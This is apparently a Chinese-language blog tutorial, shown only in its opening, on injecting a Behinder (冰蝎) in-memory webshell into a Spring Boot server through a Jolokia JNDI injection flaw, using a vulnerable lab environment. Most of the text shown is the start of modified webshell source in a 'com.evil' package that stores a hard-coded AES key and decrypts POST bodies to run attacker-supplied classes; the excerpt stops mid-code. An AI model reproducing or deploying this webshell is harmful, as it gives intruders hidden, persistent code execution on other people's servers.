SpringBoot注入冰蝎内存马实践
本文以SpringBoot的jolokia存在jndi 注入为例讲如何向服务器注入冰蝎内存马,环境来自 SpringBootVulExploit 。 首先给下改造好的冰蝎代码 package com.evil; import javax.crypto.Cipher; import javax.crypto.spec.SecretKeySpec; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; import java.lang.reflect.Method; import java.util.HashMap; import java.util.Map; public class Beh{ public void index(final HttpServletRequest req, final HttpServletResponse resp) { try { if (req.getMethod().equals("POST")) { String k = "e45e329feb5d925b"; // rebeyond HttpSession session = req.getSession(); session.putValue("u", k); Cipher c = Cipher.getInstance("AES"); c.init(2, new SecretKeySpec(k.getBytes(), "AES")); final Map myPageContext = new HashMap (); myPageContext.put("